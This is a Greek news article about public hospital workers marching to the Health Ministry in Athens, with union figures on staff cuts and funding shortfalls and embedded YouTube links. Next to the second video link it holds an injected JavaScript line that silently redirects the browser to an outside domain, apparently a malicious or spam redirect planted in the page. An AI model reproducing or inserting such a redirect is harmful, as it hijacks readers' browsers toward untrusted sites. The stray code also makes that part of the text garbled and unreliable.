Ολοκληρώθηκε η πορεία των εργαζομένων στην Υγεία (ΒΙΝΤΕΟ)

0
11

 

Ξεκινώντας από τις 7 το πρωί από το ΕΚΑΒ, με προπορευόμενες δύο άμαξες οι εργαζόμενοι στα δημόσια νοσοκομεία πέρασαν από όλα τα νοσηλευτικά ιδρύματα της Αθήνας για να καταλήξουν στο υπουργείο Υγείας και να εκφράσουν τη διαμαρτυρία τους.

Στην είσοδο του υπουργείου γιατροί και εργαζόμενοι που είχαν συγκεντρωθεί, στο πλαίσιο τετράωρης στάσης εργασίας, τοποθέτησαν συρματόπλεγμα και ανάρτησαν πανό που έγραφε, «Ματώνουν το ΕΣΥ».

https://www.youtube.com/watch?v=Po9skMn770A

«Το καραβάνι της Υγείας συνεχίζει τον δρόμο του» επεσήμανε ο πρόεδρος της Πανελλήνιας Ομοσπονδίας Εργαζομένων στα Δημόσια Νοσοκομεία Μιχάλης Γιαννακός μιλώντας στο Αθηναϊκό Πρακτορείο, λέγοντας ότι επόμενη «στάση» είναι η δυτική Ελλάδα.

«Θα ξεκινήσει από την Πάτρα και θα αποκλείσει τη γέφυρα Ρίου Αντιρρίου», είπε. Η ΠΟΕΔΗΝ κάνει λόγο για «κατάρρευση» του ΕΣΥ αναφέροντας, ότι το μόνιμο προσωπικό στα νοσοκομεία μειώθηκε συνολικά τα έτη των μνημονίων κατά 20.000, ενώ σε 40.000 ανέρχονται οι κενές οργανικές θέσεις και η χρηματοδότηση είναι μειωμένη κατά 350 εκατ. ευρώ, σε σχέση με το προηγούμενο έτος. Τα νοσοκομεία θα λάβουν 1.156 δισ. ευρώ και τα ληξιπρόθεσμα θα ξεπεράσουν το 1,5 δισ. ευρώ.

https://www.youtube.com/watch?v=JLlRw-mKZvI setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here